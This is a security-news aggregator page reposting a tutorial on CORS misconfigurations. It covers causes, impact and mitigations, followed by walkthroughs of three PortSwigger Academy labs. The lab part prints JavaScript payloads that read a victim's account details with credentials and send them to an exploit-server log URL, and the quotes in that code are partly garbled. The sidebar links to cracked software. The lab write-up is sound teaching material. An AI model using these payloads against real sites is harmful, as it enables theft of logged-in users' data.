LEFT SIDEBAR AD

Hidden in mobile, Best for skyscrapers.

CORS

2 days ago 10
BOOK THIS SPACE FOR AD
ARTICLE AD

Hazem

Cross-Origin Resource Sharing (CORS) is a security feature implemented by web browsers to control how web pages from one origin (domain, protocol, or port) can request resources from another origin. It is a mechanism that allows or restricts web applications running at one origin to access resources from a different origin. While CORS is essential for enabling legitimate cross-origin requests, misconfigurations can lead to serious security vulnerabilities.

CORS vulnerabilities arise when a web server is misconfigured to allow unauthorized or overly permissive cross-origin requests. This can enable attackers to bypass the Same-Origin Policy (SOP), which is a fundamental browser security mechanism that restricts how scripts from one origin can interact with resources from another origin.

Overly Permissive Origins:The server allows requests from any origin (Access-Control-Allow-Origin: *), which can be exploited by attackers to access sensitive data.

2. Reflection of Origin Header:

The server dynamically reflects the Origin header in the Access-Control-Allow-Origin response header without proper validation, allowing attackers to craft malicious requests.

3. Credentials with Wildcard Origins:

The server allows credentials (e.g., cookies, authorization headers) to be sent with requests from any origin (Access-Control-Allow-Origin: * and Access-Control-Allow-Credentials: true), which can lead to unauthorized access to sensitive data.

4. Insecure Preflight Requests:

The server does not properly validate or restrict preflight requests (OPTIONS), allowing attackers to bypass CORS restrictions.

The severity of CORS vulnerabilities depends on the nature of the misconfiguration and the sensitivity of the data or functionality exposed. Common severity levels include:

Low: When the vulnerability exposes non-sensitive data or functionality.Medium: When the vulnerability allows access to sensitive data but requires user interaction or specific conditions.High: When the vulnerability enables unauthorized access to sensitive data or functionality without user interaction.

Exploiting CORS vulnerabilities can lead to

Data Theft:Attackers can steal sensitive data (e.g., user credentials, personal information) by making unauthorized cross-origin requests.

2. Unauthorized Actions:

Attackers can perform actions on behalf of the victim, such as changing account settings or making transactions.

3. Account Compromise:

If combined with other vulnerabilities (e.g., XSS), CORS misconfigurations can lead to full account takeover.

4. Reputation Damage:

Exploitation of CORS vulnerabilities can harm an organization’s reputation and erode user trust.A web application allows cross-origin requests from any origin (Access-Control-Allow-Origin: *) and includes credentials (Access-Control-Allow-Credentials: true).An attacker creates a malicious website that sends a cross-origin request to the vulnerable application.The victim visits the malicious website while authenticated to the vulnerable application.The attacker’s script sends a request to the vulnerable application, which processes it and returns sensitive data (e.g., the victim’s profile information).The attacker captures the sensitive data and uses it for malicious purposes.

To mitigate CORS vulnerabilities, follow these best practices:

Restrict Allowed Origins:
a. Explicitly specify trusted origins in the Access-Control-Allow-Origin header instead of using a wildcard (*).
b. Validate the Origin header on the server side to ensure it matches a list of allowed origins.Avoid Credentials with Wildcard Origins:
a. Do not allow credentials (Access-Control-Allow-Credentials: true) when using a wildcard (*) in the Access-Control-Allow-Origin header.Use Proper Preflight Handling:
a. Ensure that preflight requests (OPTIONS) are properly validated and restricted to trusted origins.Implement Strong Server-Side Validation:
a. Validate all incoming requests, including headers, to prevent unauthorized cross-origin access.Use Secure Headers:
a. Implement additional security headers, such as Content-Security-Policy and X-Frame-Options, to further protect against cross-origin attacks.Regular Security Testing:
a. Conduct regular security assessments, including penetration testing and code reviews, to identify and remediate CORS misconfigurations.Educate Developers:
a. Train developers on secure CORS implementation and the risks of misconfigurations.

Lab 1: CORS vulnerability with basic origin reflection

Log in to your account and go to proxy history; you will notice account details.
That have Access-Control-Allow-Credentials in response, which means have CORS
vuln send the request to repeater and add origin.random.com

• You will notice that appears in response that means it is vulnerable in CORS.
• So go to the exploit server and upload this script.

<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open(‘get, ‘https://YOUR-LAB-ID.web-security-academy.net/accountDetails, true); req.withCredentials = true; req.send(); function reqListener() { location = /log?key= + this.responseText; }; </script>

And deliver to the victim and go to the access log and search for admin and copy the API.and submit the solution

Lab 2: CORS vulnerability with trusted null origin

Log in to your account and go to proxy history; you will notice Access-Control-Allow-
Credentials in account details
• Send it to the repeater, and if you add an origin with a value like random.com, it will not be
accepted, so give it null; it will be accepted like this.
Now go to the exploit server and put this script. <iframe sandbox=”allowscripts allow-top-navigation allow-forms” srcdoc=”<script> var req = new XMLHttpRequest(); req.onload = reqListener; req.open(‘get’, ‘YOUR-LAB-ID.web-security-academy.net/accountDetails, true); req.withCredentials = true; req.send(); function reqListener() { location = ‘YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key=’ + encodeURIComponent(this.response Text); }; </script>”</iframe>And press deliver to the victim and go to the access log and search for the admin API and submit the solution, and you’re done.

Lab 3: CORS vulnerability with trusted insecure protocols

Log in to your account.Then go to proxy history and send account results to the repeater.You will notice that requests have Access-Control-Allow-Origin.So give it Origin: http://subdomain.labid.web-security-academy.netThis will be reflected in the response.
Open a product page, click Check stock, and observe that it is loaded using an HTTP URL on a subdomain.Observe that the productID parameter is vulnerable to XSS.And now go to the exploit server and put this script.<script>document.location=”http://stock.YOUR-LAB-ID.web-security-academy.net/?productId=4 <script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open(‘get’, ‘https://YOUR-LAB-ID.web-security-academy.net/accountDetails', true); req.withCredentials = true; req.send(); function reqListener() {location=’https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1 “</script>Replace with your lab ID.Press deliver to the victim and go to access control and search for the admin API and submit the solution.
Read Entire Article
  3. CORS

Related

Advanced Techniques for Finding and Exploiting Outdated Software

Advanced Techniques for Finding and Exploiting Outdated Software

Top Bug Bounty Platforms Every Ethical Hacker Should Know

Top Bug Bounty Platforms Every Ethical Hacker Should Know

Hacking APIs: Authentication Attack

Hacking APIs: Authentication Attack

Introduction to Bug Bounty Programs: How to Legally Get Paid for Hacking (Yes, Really!)

Introduction to Bug Bounty Programs: How to Legally Get Paid for Hacking (Yes, Really!)

One-Click Account Hijacking on TikTok

One-Click Account Hijacking on TikTok

The Dark Side of Bug Bounty Hunting: Frustrations No One Talks About

The Dark Side of Bug Bounty Hunting: Frustrations No One Talks About

Trending

1. Earthquake Kolkata
2. Nothing Phone 3a
3. Royal Challengers vs Warriorz
4. Bangladesh
5. Kisan Samman Nidhi
6. Michael bracewell
7. Bangladesh vs New Zealand
8. Prajakta Koli
9. Sensex Nifty Stock Market
10. Mahashivratri

Popular

Install waybackurls on Kali Linux

Install waybackurls on Kali Linux

1-click RCE in Electron Applications

1-click RCE in Electron Applications

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Microsoft Office Professional Plus 2019 (x64 & x86) Multilingual + Pre-Activated

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Over 40 Apps With More Than 100 Million Installs Found Leaking AWS Keys

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

Autodesk Revit 2023 R1 Build 23.0.11.19 (x64) Multilingual + Crack

Install DalFox on Kali Linux

Install DalFox on Kali Linux

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Adobe Master Collection CC 2022 v25.08.2022 (x64) Multilingual Pre-Activated

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

Maxon CINEMA 4D Studio S22.123 (x64) Multilingual + Crack

The best Mini LED TV I've tested isn't made by LG or TCL, and it's on sale for Black Friday

The best Mini LED TV I've tested isn't made by LG or TCL, and it's on sale for Black Friday

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

‘We are not motivated by profits’ – Open Bug Bounty maintainers on finding a niche in the crowdsourced AppSec market

BOOK THIS SPACE FOR AD
RIGHT SIDEBAR BOTTOM AD
Bengali (Bangladesh) Bengali (Bangladesh) · English (United States) English (United States) ·
About Us · Terms & Condition · Contact Us
© Security Alert 2025. All rights are reserved